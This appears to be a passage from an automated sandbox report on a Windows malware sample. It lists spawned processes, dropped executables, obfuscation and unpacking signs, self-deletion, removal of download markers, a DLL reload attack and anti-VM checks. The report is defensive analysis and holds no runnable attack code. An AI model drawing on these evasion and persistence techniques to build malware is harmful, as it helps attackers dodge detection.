Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B096.exe C:\Users\user\AppData\Local\Temp\B096.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\BBE1.exe C:\Users\user\AppData\Local\Temp\BBE1.exe
Source: C:\Users\user\AppData\Roaming\gbhudtb Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\CBF0.exe C:\Users\user\AppData\Local\Temp\CBF0.exe
Source: C:\Users\user\AppData\Local\Temp\B096.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EBBE.exe C:\Users\user\AppData\Local\Temp\EBBE.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C066.exe C:\Users\user\AppData\Local\Temp\C066.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
Source: C:\Users\user\AppData\Local\Temp\B096.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Roaming\bhhudtb C:\Users\user\AppData\Roaming\bhhudtb
Source: C:\Users\user\Desktop\Md0q201V1D.exe Process created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B096.exe C:\Users\user\AppData\Local\Temp\B096.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\BBE1.exe C:\Users\user\AppData\Local\Temp\BBE1.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\CBF0.exe C:\Users\user\AppData\Local\Temp\CBF0.exe
Source: C:\Users\user\AppData\Roaming\gbhudtb Process created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Users\user\AppData\Local\Temp\21.exe Process created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
Source: C:\Users\user\AppData\Local\Temp\B096.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
Source: C:\Users\user\AppData\Local\Temp\B096.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\21.tmp
Source: DF3A.exe.10.dr Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: sqlite3.dll.35.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.35.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DF3A.exe.10.dr Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: sqlite3.dll.35.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.35.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.35.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.35.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.35.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\AppData\Local\Temp\B096.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\B096.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\C066.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\B096.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Md0q201V1D.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Md0q201V1D.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Md0q201V1D.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Md0q201V1D.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Md0q201V1D.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Md0q201V1D.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Binary string: C:\vojos\fuw.pdb source: CBF0.exe, 0000001D.00000002.451970656.0000000000417000.00000002.00020000.sdmp, bhhudtb.10.dr
Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: EBBE.exe.10.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: E64F.exe.10.dr
Source: Binary string: dC:\fudijub.pdb` source: Md0q201V1D.exe
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: E64F.exe.10.dr
Source: Binary string: C:\lewusukoviv.pdb source: C8FE.exe.10.dr
Source: Binary string: C:\yut\pabebanejupo12 f.pdb` source: C066.exe.10.dr
Source: Binary string: C:\fudijub.pdb source: Md0q201V1D.exe
Source: Binary string: wntdll.pdbUGP source: CBF0.exe, 0000001D.00000002.461326417.000000006B521000.00000020.00020000.sdmp, 1105.tmp.29.dr
Source: Binary string: wntdll.pdb source: CBF0.exe, 1105.tmp.29.dr
Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: EBBE.exe.10.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: CAC5.exe.10.dr
Source: Binary string: C:\lewusukoviv.pdb` source: C8FE.exe.10.dr
Source: Binary string: C:\yut\pabebanejupo12 f.pdb source: C066.exe.10.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: C295.exe.10.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: F11E.exe.10.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: C295.exe.10.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Unpacked PE file: 29.2.CBF0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe Unpacked PE file: 33.2.EBBE.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
.NET source code contains potential unpacker
Source: CD17.exe.10.dr, SimplePaint/FrmMain.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 16_2_02D50F1A push ds; ret 16_2_02D50F27
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 23_2_02EB6552 push ds; ret 23_2_02EB655F
Source: C:\Users\user\AppData\Local\Temp\B096.exe Code function: 24_2_00A2D47C push esi; iretd 24_2_00A2D488
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402E54 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402E63 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402665 push cs; ret 29_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_0040290C push eax; iretd 29_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402E16 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402DC0 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402DD8 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402DE8 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402DF1 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402E82 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402E85 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402D92 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402E95 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00401D9A pushad ; ret 29_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_00402E9C push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B59D0D1 push ecx; ret 29_2_6B59D0E4
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 0_2_00426B90 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426B90
Binary contains a suspicious time stamp
Source: DEDC.exe.10.dr Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
PE file contains sections with non-standard names
Source: Md0q201V1D.exe Static PE information: section name: .pale
Source: C066.exe.10.dr Static PE information: section name: .ruxat
Source: 21.exe.10.dr Static PE information: section name: .pale
Source: F1AC.exe.10.dr Static PE information: section name: Cgw(O~.
Source: C295.exe.10.dr Static PE information: section name: .vuci
Source: CAC5.exe.10.dr Static PE information: section name: .xoj
Source: CBF0.exe.10.dr Static PE information: section name: .cipizi
PE file contains an invalid checksum
Source: CD17.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x4147a
Source: BBE1.exe.10.dr Static PE information: real checksum: 0x10f50 should be: 0x5be1
Source: F11E.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x114b9d
Source: DF3A.exe.10.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: DEDC.exe.10.dr Static PE information: real checksum: 0x87179 should be: 0x81f2a
Source: B096.exe.10.dr Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: initial sample Static PE information: section name: .text entropy: 6.98974133443
Source: initial sample Static PE information: section name: .text entropy: 7.66210807275
Source: initial sample Static PE information: section name: .text entropy: 7.66469899227
Source: initial sample Static PE information: section name: .text entropy: 6.98974133443
Source: initial sample Static PE information: section name: .text entropy: 7.86113394582
Source: initial sample Static PE information: section name: .text entropy: 7.79620991915
Source: initial sample Static PE information: section name: .text entropy: 7.83179260502
Source: initial sample Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample Static PE information: section name: .text entropy: 7.8779018043
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 6.97994250456
Source: initial sample Static PE information: section name: .text entropy: 7.29655075024
Source: initial sample Static PE information: section name: .text entropy: 7.86107035261

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\bhhudtb
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\fehudtb
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gbhudtb
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\CBF0.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\gbhudtb
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C066.exe
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\BBE1.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F11E.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F1AC.exe
Source: C:\Users\user\AppData\Local\Temp\C066.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\CD17.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C295.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B096.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C8FE.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DF3A.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DEDC.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\EBBE.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E64F.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D8D0.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FD36.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\21.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\CAC5.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\bhhudtb
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\fehudtb

Hooking and other Techniques for Hiding and Protection:

DLL reload attack detected
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\md0q201v1d.exe
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\gbhudtb:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\B096.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BBE1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: B096.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DF3A.exe PID: 5464, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
